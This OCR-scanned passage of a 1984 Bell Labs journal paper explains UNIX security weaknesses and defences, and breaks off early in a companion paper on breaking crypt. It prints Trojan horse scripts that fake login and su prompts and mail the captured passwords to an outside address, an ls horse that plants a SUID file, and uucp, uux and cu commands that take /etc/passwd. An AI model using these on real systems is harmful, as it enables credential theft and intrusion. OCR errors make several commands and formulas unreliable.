730 that contains a file f of mode 644, that both d and f have the same owner and group, and that f contains the text something . Disregarding the super-user, no one besides the owner of f can change its contents, since only the owner has write permission. Notice, though, that anyone in the owner’s group has write permission for d, so that any such person can remove f from d and install a different version: rm d/f echo something else >d/f which for most purposes is the equivalent of being able to modify f . Further, had f been a directory rather than a file, the same person could have moved it (and all of its contents) elsewhere and replaced it with an entirely new structure. Thus, to ensure that a file cannot be modified, it is necessary that 1. The file itself must be write-protected. 2. The directory containing it, and all lower directories, must be similarly protected. 3. Group permissions must be considered. This last is especially important if most of the users of a system are in the same group, as is the default case on most UNIX systems. The mode of an existing file can be changed with the chmod command, or, from a C program, by using the system call of the same name. The ownership of a file is changed by using the chown command SYSTEM SECURITY 75 and system call. Some versions of UNIX restrict chown to the super- user. Others also permit the owner of a file to give it away to someone else. The latter convention provides an opportunity for fraud on systems whose users are charged for their disk space, but there is also a subtler problem that will be discussed in the next section. Finally, when a file is created, it is given the owner and group IDs of the user who created it, and a mode that corresponds to an argument of the creat or open system call, modified by a user-supplied param- eter called a umask. This parameter is also a 9-bit field, each of whose bits specifies that the corresponding permission bit not be set, i.e., the resulting permission field is the logical and of the file creation mask and the one’s complement of the umask. A user’s umask is set to some default value at login time, and can subsequently be modifed by the user via the umask command or system call. Simple prudence about accident protection suggests a default umask of 022, which makes files unwritable except by their owners. The tree of directories and files that makes up a UNIX file system is just a logical structure that is mapped onto a physical device — a disk — in order to make it easy for people to use the disk. If the physical disk can be written or read, so can any file in the file system that resides on the disk. All that is needed is a little knowledge and effort. It follows then that the special files that permit access to the physical disk should be accessible only to the super-user if file protections are to be worth much. In practice, this rule usually is relaxed so that the disks are writable only by the super-user, but that they can also be read by some administrative group. Finally, access to programs’ working storage on a machine is avail- able via the special files /dev/mem (memory) and /dev/kmem (kernel memory). Write permission for memory allows a process to modify itself in any way, including giving itself super-user privileges. Read permission allows it to inspect things like the standard input and output of other processes. Hence, the same precautions that apply to physical disk access apply here also. There is more to be said about files and file systems, and more will be said later on, after a few pitfalls have been dissected to provide some background. IV. SUID PROGRAMS The set-userid (SUID) facility is a novel and useful feature in the UNIX system. 2 It allows a program to be constructed in such a way that the individual or group ID, or both, of the user who executes the program is changed temporarily for the duration of the program’s execution. This makes it trivially easy to write programs that would be difficult or impossible to implement on other operating systems. Any user can 76 TECHNICAL JOURNAL, OCTOBER 1984 set up a game that keeps a score file that is normally protected from others but is open for writing and reading to anyone who is currently playing the game. There are some programs that are similarly easy to write, like ps, which shows what is going on in the system (by reading operating system memory locations); df , which shows disk utilization (by reading the physical disk); and passwd, which lets a user write in the password file to change a password. Two bits in the mode of a file in which a program is kept determine whether the program will be of the SUID variety. These are kept in an octal digit just to the left of the permission bits. Octal 4xxx changes the user ID to that of the program’s owner. Octal 2xxx changes the group ID to that of the owner’s group. As with the permissions, these bits are set by chmod. If any user of the system were free to issue the following sequence of commands: cp /bin/sh a . out chmod 47 7 7 a . out chown root a. out the result would be a shell that would give super-user privileges to anyone who executed it. The danger is obvious, and is disabled by the design of the chown and chmod commands and system calls. The disablement takes one of two forms, depending on the version of UNIX system. 1. If the version of the UNIX system restricts chown to the super- user, there is no problem. 2. If the version permits a user to give away files, chown first knocks down the SUID bits before changing ownership. The clear danger is taken care of, but the feature is by no means tame. Over the years it has provided truly horrid security flaws in various versions of the system. Some early versions of the mail command, which ran as super-user so as to be able to write in protected mailboxes, could be coaxed to do things like appending lines to the password file. Some versions of login, when invoked after all available file descrip- tors were in use, would log a user in as the super-user. Sending a quit signal to a running SUID program would produce a writable SUID file called core, suitable for debugging and other things. The list is long, but the point is made: the SUID facility is a very powerful tool, and like all powerful tools it must be handled with care. Here are some hints about care. SUID programs should be used only when there is no other way to get a desired result. On most UNIX systems, perhaps a dozen SUID programs, excluding games, are really needed. A lax attitude about SUID programs, combined with a ‘quick and dirty’ programming style, SYSTEM SECURITY 77 can produce disasters. As an example, a security audit on a system on which a number of people working on the same project had need to write in each other’s files turned up an alarming fact. The people involved knew next to nothing about how to use groups and were too lazy to learn, so they resorted to SUID programs instead. About 200 of these were found. Half of these were owned by the super-user, and most of these were writable by others, including one called a. out whose permission field was 777. Unfortunately, such sloppiness is not rare. It is difficult, when users are writing all but the most trivial pro- grams, to determine in advance that the program will be correct. Programs sometimes do the most amazing things in unforeseen cir- cumstances. When SUID programs are being designed and written, it is particularly important to pay attention to simplicity of function and cleanliness of implementation, since unexpected behavior can easily produce security holes. Escapes from SUID programs — child processes that are given a shell — are highly unrecommended. If these cannot be avoided, the designer must carefully consider the consequences of inherited files, signals, the shell’s environment, and so on. Some systems provide a restricted shell whose capabilities are somewhat less than those of the standard shell. The restrictions are useful in reducing the accident rate among data-entry clerks and in similar applications. Using a restricted shell to contain an intruder is rash. Most of these are about as restrictive as childproof bottle caps. SUID programs that are writable by anyone besides their owners should be considered threatening. System administrators should verify that the SUID programs that are supplied with the system are clean (i.e., the source has not been tampered with to provide new features, and that the binaries have been compiled from the clean source.) This last precaution is necessary but not sufficient. In Ref. 3, Thompson shows that compilers can be infected so as to modify the code that they compile, without leaving visible traces of the modification in any source code, even that for the compiler. In practice, such compiler viruses are likely to be rare, simply because they require much more skill and effort than other tampering techniques. V. TROJAN HORSES A favorite tool of the intruder is the Trojan horse. As the name implies, a Trojan horse is a program that an intruder gives to an unsuspecting user of a system. It does what it is obviously supposed to do, but it also quietly performs some malfeasance on behalf of the 78 TECHNICAL JOURNAL, OCTOBER 1984 intruder. The technique has been around for thousands of years, and it still works splendidly. Here are some modern instances. Ritchie 4 shows a noncryptanalytic way of finding out passwords as follows: “Write a program which types out login: on the typewriter and copies whatever is typed to a file of your own. Then invoke the command and go away until the victim arrives”. At first glance, this seems to be a case of some legitimate user of a system coveting a neighbor’s password, but in fact there are more interesting applica- tions. Also implied is that the horse must faithfully simulate the nontrivial login command, which is a lot of work. Actually, all that is needed is to simulate an unsuccessful login attempt, as if the user had made a typing mistake, and that is a horse of a different color: echo -n “login: ” read X stty -echo echo -n “Password: ” read Y echo “ ” stty echo echo $X $Y [mail outs idelcreepS sleep 1 echo Login incorrect stty 0 >/dev/tty The shell script is simplicity itself with a few kindnesses added to make its victim feel more at home. It asks for a login name and then a password, mails these to the bad guy, announces failure, and hangs up the phone. The user then dials the computer, gets a real login command, carefully types what is asked for, and goes about business as usual, unaware of the swindle. Note that there was no requirement that the horse be planted on the target machine, and in practice this will likely not be the case. Once on the target machine, the intruder can use similar horses to acquire the privileges of other users. One of the most frequently used commands on UNIX systems is is, which is UNIX system shorthand for “tell me some things about these files”. The is command can be used in many contexts and with many options, but as was the case with login, a trivialized version can give joy to an intruder: >somewhere/. harmless chmod 67 7 7 somewhere/. harmless sleep 2 echo “{is: not found” rm Is SYSTEM SECURITY 79 It is placed in an executable file named 1 s in any writable directory that the victim will search for commands before looking in /bin. When executed, it creates a writable file called . harmless in some far corner of the machine, with the SUID bits turned on in the file’s permission mask. It then prints {is: not found, erases itself, and exits. The ( is indicative of a noisy telephone line. People are used to it, and will automatically retype a command that gets such a hit. When the command is retyped, the horse is gone, and the real is is executed. Sometime later, the intruder will copy the shell into .harmless, execute it, and assume the identity of the victim. The most desirable identity for the intruder to assume is that of the super-user. System administrators acquire super-user privileges by executing a program called su. The su command asks for the root password and bestows systemwide privileges to those who type it correctly. A horse named su, placed where it will be executed by a system administrator, can usually be relied on to send a gift within hours: stty -echo echo -n “Password: read X echo “ ” stty echo echo $X j mail outs ide!creep£ sleep 1 echo Sorry, rm su Horses like this are easy to make and can be custom-tailored to suit a wide variety of applications. Knowing how they work suggests ways to defend against them, as discussed below. In order for horses like is and su to work, they must be planted in places where they will be executed by their intended victims. The operating system searches for commands in a sequence of directories named in a string called PATH that is associated with each user. PATH is set each time a user logs in, and may be modified in the course of the terminal session. Typically, it specifies the user’s current working directory, perhaps a private directory, /bin and /usr/bin, usually in that order. If the directories that are searched prior to /bin are not writable by the intruder, the horse cannot be planted. Such protection is most important for system administrators. A secondary level of protection can be achieved by having people’s .profile files unreadable, so that an intruder is not shown the intended victim’s initial PATH setting. This turns out to be a minor nuisance, and offers 80 TECHNICAL JOURNAL, OCTOBER 1984 little additional protection, as vulnerable PATH components can be deduced in other ways. Modifying the (real) su program so that it insists upon being invoked by a full path name is very effective. The change is trivial — the program needs only to check that the first character of its zeroth argument is /. Legitimate users very quickly fall into the habit of typing /bin/su rather than su, thereby guaranteeing that the official version gets executed, regardless of whether a horse is nearby. A further recommended change to su is that on successful invocation it changes the PATH string so that only /bin and /usr/bin will be searched for commands. This prevents nonstandard versions of com- mands like is from being executed with super-user privileges. There is no defense against the login horse except user education. Anyone who walks up to a previously unattended terminal that says “login:” and types in the keys to the machine is fair game. VI. NETWORKING Several times in the previous discussion it was tacitly assumed that files pertaining to the security of a system — in particular, the password file — might very well be available to an intruder who had not yet managed to penetrate the system. It turns out that the same commu- nications programs that facilitate the exchange of ideas and informa- tion among people on different machines can, unless great care is taken, be used to subvert a machine from a safe distance. The uucp program 5 makes it possible to copy files from one UNIX system to another, and is the workhorse of UNIX networking. Indeed, the ease of information interchange by way of uucp and programs like mail that use it accounts for much of the usefulness and popularity of the UNIX system. The problem with uucp is that, if left unre- stricted, it will let any outside user execute any commands and copy out or in any file that is readable/writable by a uucp login user. It is up to the individual sites to be aware of this and apply the protections that they think are necessary . 6 If the administrator of a site is naive or inattentive, getting a password file from that site can be as easy as typing uucp -m target ! /etc/pa sswd gift to copy the remote machine’s password file to a local file called gift. (The -m option is a convenience, not a necessity. It causes uucp to send mail to the intruder when the gift has arrived.) Three years ago, this ploy was almost certain to succeed. Today, many (but not all) systems have restrictions on which files can be accessed and by whom. Typically, they restrict access to a directory reserved for that purpose: /usr/spool/uucppublic. SYSTEM SECURITY 81 If the direct approach is spurned, uux might be tried. The uux program is part of the uucp system. It causes execution of programs to take place on remote systems. Its main use — in practice, almost its only use — is to start up the mail delivery machinery on a remote system after uucp has delivered the mail files to a spooling area. Like uucp though, it has full generality built in, and it may be possible to successfully execute a command like: uux “target! cat /usr/spool/uucppubl ic” This copies the password file to the remote machine’s spool direc- tory, from which it can later be plucked. Like uucp, uux may have some restrictions, but there is a difference: to ensure generality, the remote system passes the arguments of uux to a shell for interpretation and execution. The far end of a uucp transaction needs only to see whether access to some file is legitimate, but the far end of a uux transaction must examine the command and its context and decide whether the result will be harmful. The latter is extremely difficult, because the shell, like most other macroinstruction processors, has some very complex quoting conventions deliberately designed to hide certain types of strings until the proper time for their expansion. An intruder with sufficient shell programming experience is likely to succeed here. Finally, given that neither uucp nor uux will perform as directed, there is always the option of making a private copy of uucp. No special permissions are required, either to run the program or to access the telephone dialers. The private copy can assert that it is calling from anywhere, and there is no way for the called machine to verify the claim. Thus, an intruder stands a good chance of dialing into one of a cluster of friendly machines, masquerading as one of the family, and finding access permissions greatly relaxed. Another communications program, called cu, is especially appealing to intruders: The name cu stands for 'call UNIX.' It allows a user of a UNIX system to call another system, not necessarily a UNIX system, and to conduct an interactive session on the remote machine. A typical cu session starts like this: $ cu 55512 12 Connected remote login: user Password $ [session from here until ] 82 TECHNICAL JOURNAL, OCTOBER 1984 Note the sequence of events. The cu command is invoked and given the telephone number of the remote machine. A connection is made, and the user is asked for a login name and a password. If these are correctly given, the session proceeds as if the user had manually dialed in. The session ends when the user types a line beginning with . ". Consider two machines, one on which very careful attention has been paid to security concerns, and another on which security issues have been utterly neglected. An intruder on the weak machine need only install a horse — a version of cu that, in addition to making connections, also copies the first few lines of a session somewhere — to obtain the keys to the strong machine. It would seem that a good rule to follow with cu could be never to use it to get from a weak machine to a stronger machine, but sometimes this is not sufficient. The command cu allows escape sequences that are not transmitted to the remote machine, but instead cause certain useful functions to be performed. For example, any line beginning with ~%put tells cu to copy a file from the local machine to the remote; lines beginning with~%take cause things to go the other way. Of special interest are lines beginning the ! that cause commands to be executed on the local machine: ~!mail lets a user read mail on the local machine while still connected to the remote. For some versions of cu, the local machine cannot tell how a line was generated when it gets it from the remote machine. It just has a line of text. If the line says ~!mail somewhere < /etc/passwd it may have been typed deliberately by the user, it may have been written to the user’s terminal by a bad guy on the remote machine, or it may have been contained in a file on the remote machine that the user had been printing. The result is the same in any case: the password file is tossed over the wall. The ct command causes a machine to call out to a terminal in order to let that terminal log in to the machine. It is otherwise identical to the cu command, but from an intruder’s point of view, the target machine gets to pay the phone bill. This reduced cost is counter- balanced by the greatly increased risk of getting caught by audit procedures. Finally, there are Local Area Networks (LANs). These are arrange- ments in which some kind of high-speed communications channel is used to connect a cluster of machines that are geographically close to SYSTEM SECURITY 83 one another (e.g., a dozen machines in the same building). The intent of an LAN is usually not only to make it easy to share information, but also to provide users of all the machines in the network with handy access to resources (such as typesetters) that are not economical to replicate on each machine. Unlike uucp and cu, which are fairly standard, LANs come in many different flavors. It would be unkind and not very useful to dissect some particular LAN here, and trying to cover even the more popular ones would require a long and mostly uninteresting book. The hazards are exactly those of uucp and cu: remote execution, masquerading, and faulty access permissions. The forms that the attacks will take are of course different. Security holes in machine-to-machine communications are well known, and sometimes difficult to fix. No special permissions are inherently required to access communi- cations devices. This makes it possible to obtain a private copy of a communications program and to modify it so that it calls out mas- querading as some other machine or some other user. Even if special privileges were required, little would be gained, as the threat is to the remote, as yet uncompromised, machine, not the local machine on which an intruder has presumably already obtained the required permissions. Given that a remote machine cannot reliably identify its caller, allowing the remote execution of arbitrary commands is a sure way to invite trouble. Remote execution of a shell is deadly, but even an innocuous command like cat can be used to an intruder’s advantage. The uucp program that is used by most UNIX machines was not written with security in mind. It can do just about anything, and it is up to the system administrator to restrict its capabilities. The restric- tions needed are by no means obvious. The cure is to rewrite uucp so that it is able to deliver mail, to copy files to and from spool directories, and to send out data only when it has initiated the connection. We have done this in our research environment some time ago. 7 Other efforts are in progress elsewhere. 8,9 The cu program can be a security disaster. Banning it from a machine or restricting access to devices will do no good at all r for the obvious reasons. The best that can be done is to educate users: 1. Do not use cu from a machine that is not trusted. 2. Do not use cu to a machine that is not trusted. 3. Do not browse on the remote machine. (This advice is remarkably similar to that which parents give their children: “Do not go for a ride with a stranger.”) Local area networks should be treated as individual machines for security purposes. 84 TECHNICAL JOURNAL, OCTOBER 1984 VII. ENCRYPTED FILES UNIX systems are distributed with a command called crypt, which is used to encrypt and decrypt files. 10 Cleartext is supplied as input to the program. A key (the cryptologist’s term for a password) is either given on the command line or supplied interactively, and ciphertext is output. The transformation performed by crypt is its own inverse, so that using the same key converts ciphertext to cleartext. The crypt command is used in many applications, and often very unwisely, as its safety depends on a very large number of factors that are often not considered by naive users. The purpose of this section is to present those facts that ought to be considered, so that the user can make an informed decision about a particular application. It is possible to decrypt an encrypted file without knowledge of its key. This is hardly surprising, as successful methods of attacking rotor machines have been known for over 50 years. 11 The job can be very time-consuming; it is not just a matter of aiming some magic program at a file of ciphertext and obtaining cleartext. The method is described in detail in a companion paper by Reeds and Weinberger. 12 The amount of work that it takes to decrypt a file varies, depending on what clues are available. For a file of encrypted English text, several hours of work is not atypical. Decryption of files can be made easy or hard, depending on how crypt is used. A one-size-fits-all approach to key selection is a particularly bad idea. It goes without saying that a user’s login pass- word, if known, will be tried as a possible key, but there are other problems. If ten files are encrypted with the same key, then all ten files can be decrypted when only one is done. Moreover, having more than one file encrypted with the same key lets a cryptanalyst switch to a different target when guessing at probable text gets hard. Very frequently, a user of crypt will forget to remove a cleartext file after producing an encrypted version. Such cleartext can only be described as 'gold’. Executable programs (binaries) that have not been stripped of their predictable symbol tables are vulnerable. Double encryption, that is, passing text through crypt twice, makes the job of decryption harder, but not much. Simple-minded preprocessing schemes, such as exclusive ORing the file with some constant, do not help. Preprocessing the cleartext so that there is no longer a one-to-one correspondence between clear- and cipher-bytes dramatically weakens the attack. For example, using the pack command to get a Huffman- encoded version of the file before passing it through crypt ensures that characters will cross byte boundaries, thus rendering byte-ori- ented decryption techniques useless. SYSTEM SECURITY 85 Much more dangerous are the noncryptanalytic attacks. The tech- niques for guessing passwords are exactly those for guessing keys. And a Trojan horse version of crypt can take minutes, not hours for an intruder to install. Finally, the frequency distribution of the bytes in an encrypted file is uniform. This is so unlike those of other files in the system that such files practically scream for the attention of an intruder. This is well worth remembering. VIII. MISGUIDED EFFORTS It is one thing to clean up a system by plugging open holes, and quite another to install security machinery that collects evidence of possible chicanery. The latter can be very useful or very dangerous, depending on how it is done, since it often happens that information that is helpful to system administrators can be just as helpful — or more so — to an intruder. Here are some security tools that can help weaken system security. 8 . 1 Logging su activity The su command allows a user to assume the identity of any other user (the default being root, the super-user) if the password corre- sponding to the desired new identity is correctly given. As a security measure, most implementations of su also append a line to a log file called suiog. The line contains a time stamp, the name of the user, the proposed new identity, and a flag showing whether the transfor- mation succeeded. Clearly, this file must be protected from writing by all but the super-user. Normally, only a small number of people on a given machine are supposed to have super-user privileges, and all of these should be known to the system administrator. Thus, by looking in suiog for those who have become root, the administrator can get a very short list of names in which a stranger will likely stand out like a sore thumb. Now consider the plight of an intruder who has just used a borrowed password to break into a strange machine, and who now has the task of locating the important people from among perhaps hundreds in the password file. Fortunately, the important people can be identified readily by their ability to become super-user. Thus, the same technique applied to the same file produces the same list — but now it is a list of horse targets. This implies that suiog had better be unreadable as well as unwrit- able. Such files are difficult to handle for a variety of reasons. Copies and summaries with relaxed permissions are likely to be owned by the important people. 86 TECHNICAL JOURNAL, OCTOBER 1984 The sulog command thus appears to help both the defenders and the attackers. This would indeed be the case if there were ever a need for an intruder to make an entry in the file. There is no such need. Only the most inexperienced intruder will use the su command to try out a guess or a pilfered password. The indirect approach of encrypting the guess and comparing it with the password file entry will provide verification without leaving any tracks. Once sure of a password, the intruder can then use su, and just remove the last telltale line from sulog. If sulog exists on a machine, no matter how it is protected or what it is called, then there is a potential risk for the administrator but none for the knowledgeable intruder. The way to reverse the score is to keep the tracks off the machine, where they cannot be accessed, even by the super-user. The paper console copy in the machine room is a very good place, especially if the system administrator reads it occasionally. 8.2 Password aging One of the many problems with passwords is that most people, left unreminded, will keep a password forever. The longer a password is used, the greater the chance that it will become compromised. Also, stolen passwords are useful to their thief for as long as they remain valid. Most UNIX systems are provided with a feature called password aging, which, if activated by the system administrator, will cause users of the system to change their passwords every so often. The goal is laudable. The algorithm, however, is bad, and the implementation, from a security standpoint, is just awful. Within systems in which the feature is used, the system administrator assigns, on a user-by-user basis, the length of time that a password can remain valid. The first time that a user whose password has rotted attempts to log into the system, the message: Your password has expired. Choose a new one is printed and the user is made to execute the passwd command rather than the shell. The passwd command prompts for a new password, installs it, and records the time of installation. Further, to prevent a user from changing a password from x to y and then promptly back to x, passwd will refuse to change a password that is less than a week old. Four things are wrong here. First, picking good passwords, while not very difficult, does require a little thought, and the surprise that comes just at login time is likely to preclude this. There is no hard evidence to support this conjecture, but it is a fact that the most incredibly silly passwords tend to be found on systems equipped with password aging. SYSTEM SECURITY 87 Second, the user who discovers that the new password is unsound or compromised cannot change it within the week without help from the system administrator. Third, the feature only forces people to toggle back and forth between two passwords. This is not a great gain in security, especially if it encourages the use of less-than-ideal passwords. Fourth, as implemented, the date and the lifetime of a password is encoded, not encrypted, just after the encrypted password in the password file. It is easy to write a program that scans a password file and prints out a list of abandoned accounts, together with the length of time each account has been unused. Whether this is a horror or a blessing depends on one’s point of view. The aging of passwords is a difficult problem, yet unsolved. 8.3 Recording unsuccessful login attempts Some systems record unsuccessful login attempts. The login name, time, and terminal number are stored, but the password used is not, for the obvious reasons. The intent of such logging is to alert the system administrator that an intruder stands at the door making guesses at the key. One reason that login attempts fail is that people sometimes type a password when asked for a login name. Whether this is due to haste, carelessness, inattention, or sluggish system response during peak hours is not known. What is known is that collecting login names from unsuccessful access attempts will almost invariably collect a few passwords as well, and that any login name thus collected that is not found in the system’s password file is almost certainly a password. Finding the match is not difficult. 8.4 Disabling accounts based on unsuccessful logins Some systems will count the number of consecutive unsuccessful login attempts for a particular user and disable the account after some pain threshold is reached. The magic number is usually three. This ploy has the marginal benefit of annoying would-be intruders who go through the unprofitable exercise of casting spells at the door, hoping it will open. For the intruder who has already gained access to the system, and who wants to get rid of the system administrator, the feature is a blessing: login: guru password: foo repeated the appropriate number of times will assure the intruder of privacy for at least a little while. 88 TECHNICAL JOURNAL, OCTOBER 1984 IX. PEOPLE By far the greatest security hazard for a system, the UNIX system or otherwise, is the set of people who use it. If the people who use a machine are naive about security issues, the machine will be vulnerable regardless of what is done by the local management. This applies particularly to the system’s administrators, but ordinary users should also take heed. 9 . 1 Administrators' concerns The system administrator is responsible for overseeing the security of the system as a whole. Several things are especially important. The password file is the most important file to watch in the system. It should not, of course, be writable by anyone other than the super- user, nor should it be available for perusal by anyone who is not currently logged into the machine. For example, it should not be shipped by uucp in response to an outside request. Login entries with no passwords are very unwise. Group logins, that is, the use of a single login name and password for a number of people, are to be avoided. The owner of a machine is entitled to know who is using it, and group logins thwart this. Further, the idea of a group login does little to instill in its users the notion that they are individually responsible for their conduct on a machine. The worst group login, and one that is found on virtually all UNIX machines, is root, the login name of the super-user. Every time that someone logs in as root, the system administrator can tell that someone logged in with super-user privileges, but there is no hint as to who that person might be. Many systems make it impossible to log in as root via dial-up lines; some restrict the login to the system console. In fact, there is no need for anonymous super-users. It is better to require a normal login and effect the transformation via the su command, especially if su leaves tracks on a piece of paper some- where. The use of restricted shells to contain people who log in without passwords or through group logins is simply ineffective. Administrators’ personal passwords are most important, both to the administrators and to potential intruders. An intruder is happy to get anybody’s password that provides access to the machine. If the pass- word is that of a system administrator and thus allows some special group permissions such as bin, sys, or uucp, so much the better. It is strongly recommended that on the machines that they maintain ad- ministrators use different passwords than they use on any other machines. A system administrator should be able to explain the presence of every SUID-root program on the system, and to show that these have SYSTEM SECURITY 89 at least been looked at for surprises. Compilation from ‘clean’ source code is helpful, but not always sufficient. Protection against horses for people who have super-user privileges is essential. This means checking PATH variables, directories, and files owned by such people to see that the files that they execute are writable only by themselves or by trusted administrators. Again, such protection is not sufficient, but it does remove the obvious targets. Finally, the system administrator should work to develop an aware- ness of security issues in the user community as a whole. 9.2 Users' concerns Users, including system administrators, often have surprisingly bad habits with respect to system security. Here are some of the worst. • Giving away logins and passwords is all too common. The same people who would never consider giving the keys to a company car to a friend are often quite willing to give away the keys to the company computer, even though the potential for loss may be orders of magni- tude greater. • Obvious swindles tend to be ignored. Most Trojan horses work only because most people have not given any thought to the fact that programs that ask for things like passwords might not be the genuine article. If something goes wrong, they ask no questions. • Generally, little thought goes into the choice of nontrivial passwords, passwords are not changed except under duress, and a one-size-fits- all attitude is common. • Carefree networking is the norm, not the exception. • Sensitive information about projects and people is routinely kept on public machines. The only approach to these problems is user education. X. CONCLUSION At the beginning of this paper it was noted that UNIX systems, when used for the purposes and in the environment for which they were designed, cannot be made secure. The supporting arguments for that statement should now be clear. The following ideas should also be clear: The security of any given UNIX system can vary from very weak to very strong, depending on a large number of factors and their interactions. The most important of these is the habits and attitudes of administrators and users. Software changes can be made that will greatly increase the security of a system. However, since the same tools can be just as potent for an intruder as for an administrator, they must be carefully designed, lest they backfire. 90 TECHNICAL JOURNAL, OCTOBER 1984 The question of convenience versus security, which depends on the nature of a given application, must be carefully considered before implementing and installing that application. In particular, there are some things that should not be put on any public machine. It was also noted that the security hazards of UNIX systems are exactly those of other systems that are used for similar purposes in similar environments. Only the forms of the hazards are different. If, from the examples given, it seems easier to subvert UNIX systems than most other systems, the impression is a false one. The subversion techniques are the same. It is just that it is often easier to write, install, and use programs on UNIX systems than on most other systems, and that is why the UNIX system was designed in the first place. REFERENCES 1. R. Morris and K. Thompson, “Unix Password Security,” CACM, 22, (November 1979), p. 594. 2. D. M. Ritchie, “Protection of Data File Contents,” U.S. Patent 4135240, January 16, 1979. 3. K. Thompson, 1983 ACM Turing Award Lecture, New York, November 1983, also in CACM, 27, No. 8 (August 1984), pp. 761. 4. D. M. Ritchie, “On the Security of UNIX” UNIX Programmer’s Manual, Section 2, AT&T Bell Laboratories. 5. D. A. Nowitz and M. E. Lesk, “Implementation of a Dial-Up Network on UNIX Systems,” Fall COMPCON, Washington, D.C. (September 1980, pp. 483-6. 6. D. A. Nowitz, “UUCP Implementation Description,” UNIX Programmer’s Manual, Section 2, AT&T Bell Laboratories. 7. R. T. Morris, “Another Try at Uucp,” unpublished work. 8. D. A. Nowitz, P. Honeyman, and B. E. Redman, “Experimental Implementation of Uucp,” 1984 UNIFORM Proc. 9. Tom Truscott, “An Enhanced Uucp,” Research Triangle Institute Technical Mem- orandum CDSR005, Research Triangle Park, North Carolina, December 1983. 10. R. H. Morris, “Unix File Security,” unpublished work. 11. J. Garlinski, The Enigma War, New York: Scribner, 1979. 12. J. A. Reeds, and P. J. Weinberger, “The UNIX System: File Security and the UNIX System Crypt Command,” AT&T Bell Lab. Tech. J., this issue. AUTHORS Frederick T. Grampp, B.S. (Electrical Engineering), 1964, Newark College of Engineering; M.S. (Mathematics), 1969, Stevens Institute of Technology; AT&T Bell Laboratories, 1963 — . Mr. Grampp has worked on a variety of software projects at AT&T Bell Laboratories. He was a Visiting Lecturer in Mathematics at Stevens Institute of Technology from 1969 to 1971, and in Computer Science at Rutgers University, 1975 to 1976. He is presently Supervisor of the Computing Facilities Research group. Member, AAAS, ACM. Robert H. Morris, A.B. (Mathematics), 1957, A.M., 1958, Harvard Univer- sity; AT&T Bell Laboratories, 1960 — . Mr. Morris was first concerned with assessing the capability of the switched telephone network for data transmis- sion in the Data Systems Engineering department. From 1962 to 1981, he was engaged in research relating to computer software. Since 1981, he has been SYSTEM SECURITY 91 involved in the design of a large parallel computer for signal processing. He is presently a Supervisor in the Signal Processors Engineering department. He taught mathematics at Harvard University from 1957 to 1960 and was a Visiting Lecturer in Electrical Engineering at the University of California at Berkeley from 1966 to 1967. He was an editor of the Communications of the ACM for many years. 92 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: File Security and the UNIX System Crypt Command By J. A. REEDS* and P. J. WEINBERGER* (Manuscript received March 20, 1984) Sufficiently large files encrypted with the UNIX ™ system crypt command can be deciphered in a few hours by algebraic techniques and human interac- tion. We outline such a decryption method and show it to be applicable to a proposed strengthened algorithm as well. We also discuss the role of encryption in file security. I. FILE SECURITY Sometimes one wants to protect a file from being read by unauthor- ized users or programs, while still keeping the file available to its proper users. Only in isolation is the problem easy: put the file on a machine only you have access to, and keep all copies of the file locked up. The crypt command is useful in the more complicated environ- ment of a multiuser system. The crypt command, is a file-encryption program, which is also part of one of the text editors. The algorithm is described in the next section. The advantage of having the algorithm embedded in an editor is that the clear text never need be present in the file system. No technique can be secure against wiretapping or its equivalent in * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 93 the computer. Therefore no technique can be secure against the system administrator or other sufficiently privileged users. For these folk it is a simple matter to replace the encryption programs with programs that look the same to their users, but that reveal the key to the sufficiently privileged. Sophisticates may be able to detect this kind of substitution if it is not done carefully, but the naive user has no chance. To protect files from being read by a casual browser there are two independent techniques, permissions and encryption. The authoriza- tion mechanisms supported by the system may make the file inacces- sible to any but its owner. Encryption may make the contents incom- prehensible. The former does not protect copies of the file on dump tapes. The latter is difficult to implement. The difficulty is not in finding a secure encryption algorithm, but in finding one that is not prohibitively expensive to use, not subject to fast search of key space, fits in with an editor, and is also sufficiently secure. File encryption then is roughly equivalent in protection to putting the contents of the file in a safe, or a locked desk, or an unlocked desk. The technical contribution of this paper is that crypt is rather more like the last than the first. II. UNIX SYSTEM CRYPT The UNIX operating system crypt command operates on consec- utive blocks of 256 characters, which we term cryptoblocks to avoid confusion with the file system blocks. If the ith plaintext and cipher- text characters in the jth cryptoblock are denoted p,y and c ijf respec- tively, they are related by the following formula: cy = R 1 [S[ J R(r + py) + j] - j] - i. ( 1 ) In (1) addition and subtraction are done modulo 256. R is a permuta- tion of the set {0, • • • , 255}, S' is a self-inverse permutation of the same set, having no fixed points. Therefore S is the product oi 128 disjoint 2-cycles, and for all i and j it is true that p t > 5* c,y. R and S constitute the key of the cipher, and thus are not known at the beginning of the cryptanalyst’s labors. (See Section V for a discussion of how they are determined from the key that the user types, and how part of the key that the user types can be determined from R and S.) An operator notation is more useful, in which eq. (1) can be rewritten as: dj = CT i Rr 1 C~ j SC j RC i pjj, (2) where C mapping x to x + 1 is the cyclic shift transformation (Caesar shift is the usual jargon). 94 TECHNICAL JOURNAL, OCTOBER 1984 One weak point in the cipher is that the index i hardly enters into formula (2). If we let Aj = R~ l C~ j SC j R (3) then Cij = C^AjCpij, where Aj is self-inverse, and without fixed points. This decomposes the cryptanalysis into two parts, the first being the recovery of Aj in each of several successive cryptoblocks, and the second being processing information about the A/s to get R and S. III. RECOVERING A,- 3 . 1 Known plaintext solution Suppose the cryptanalyst has parallel plaintext and ciphertext. This should be enough to recover most of the Aj. The cryptanalyst should concentrate on one cryptoblock and drop the subscript j. For each value of i for which the cryptanalyst has c* and p* C'ci = ACpi from the definition of A. Thus A(i + pO = i + c iy and because A is self- inverse, A(i 4* Ci) = i + p^ If all 256 plaintext characters are known for the cryptoblock, there will be a lot of these equations, and most of A will be known. More precisely, A is the product of 128 disjoint 2-cycles. Each i for which the plaintext is known determines one of the 2-cycles. If one assumes that the 2 -cycles have equal probability of being chosen, the chance of a given 2-cycle not being chosen is (127/128) 256 = (1-2/256) 256 , the expected number of 2-cycles not chosen is 128 (1-2/256) 256 , and the expected number of known values is approxi- mately 256 (1 — e~ 2 ), which is 221.35. Thus, each block of known plaintext should give all but about 35 of the values of Aj. 3.2 Unknown 